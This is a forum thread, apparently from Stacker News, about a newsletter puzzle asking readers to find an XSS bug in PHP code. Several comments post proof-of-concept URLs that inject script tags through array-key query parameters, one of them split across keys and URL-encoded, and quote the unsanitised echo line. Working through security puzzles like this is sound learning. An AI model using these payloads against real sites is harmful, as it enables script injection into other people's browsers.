I am subscribed to the Intigriti newsletter and I was about to unsubscribe but then I saw that they included this section:
Hacking Time: Can you spot the XSS vulnerability?
XSS might be easy to find, or not.... Can you seem to spot the cross-site scripting (XSS) vulnerability in this code snippet?
The exploitation method showcased in this example is commonly overseen by most bug bounty hunters, as they’re not aware of the possibility to pass your malicious XSS payload in this different format!
2.5k sats for the first correct answer!
2,500 sats paid 2 times
You can write a script tag into the page with a specially crafted filter? https://example.com/index.php?filter[
<script>
alert('Hacked')</script>
]=valueI don't know if you looked up the solution, but you were the first one who posted the exploit code, so I'll also pay you next to #914079
I did look up the documentation for the php functions and was testing if it actually was the hack with a wasm php thing so I appreciate it. I did feel dumb when they pointed out that the tweet had the answer when i even signed up for the blog to try and see if the answer was there
https://example.com/index.php?filter[category%3Cscript%3Ealert%28%27Ha]=value&filter[cked%27%29%3C%2Fscript%3E]=val
you can also break it up into multiple categories and url encode because $_GET handles that. this would look normal to the user in the ui rendering as You're currently filtering by "category"
I still dont know what they wouldn't see
Yeah that 'oversee' part threw me off but it's the first thing you see ^^
deleted by author
if that's so then @WeAreAllSatoshi got it right. But I agree with @ek, this is not something that would be missed by most bug hunters 😂
lol that was indeed the case
but maybe the hard part was to actually exploit it, not just see that it could be exploited
I'd have paid the bounty to @WeAreAllSatoshi myself if you wouldn't have. Thanks for being cool and paying it out twice.
@ek and I are buds, he wouldn't do me like that
In that case thanks for being cool to @carter
Agree. @ek's cool, he wouldn't do that to anyone.
My previous comment makes it sound like @ek and I were in on it together, which was definitely not the case. We've just developed a rapport over time here on SN
damn, can't access, returns 429 Too Many Requests currently
i was gonna ask if the answer was already given... it did get me to signup for that newsletter. my tin foil hat assumed this post is an ad
https://xcancel.com/intigriti/status/1893240582044066130
Rendering the filter query inside of HTML markup without being sanitized is my guess. All user input is evil
Yes but it doesn’t sound like this should be missed by most bug hunters 🤔
Agree, it’s just the first thing that I saw
Maybe it has a really hard time talking about it's feelings?
@remindme
in 1 day to pay out the bountypaid the bounty to #914079
I wonder if you will still get reminded about this, because I don't think strikethroughs cancel it out?
Yeah I probably will but maybe the mention regexp on the server didn't register the mention because of the ~ in front and deleted the reminder, let's see lol
Yea I don’t recall. Maybe it followed a word boundary so it did cancel it. Keep me posted lol
Hey thanks!
IMG source with external URL can return something nasty like SVG
The other option I see would be a maliciously-entered product entry with a bad name that could result in XSS when rendered, but that’s also implies compromise to your product management API
’’’echo "
<p>
You're currently filtering by "" . implode(", ", array_keys($product_filter)) . ""</p>
"; ’’’echo "
<p>
You're currently filtering by "" . implode(", ", array_keys($product_filter)) . ""</p>
";That code part gives the opportunity for malicious user to injects JavaScript code into the
filterparameter (e.g., via a URL query string like?filter=<script>alert('XSS')</script>), it would be executed in the browser because the input is not sanitized or escaped.if you make a array querystring instead of a dict you can control the indexes of the array http://example.com?filter[]=1&filter[]=2&filter[]=3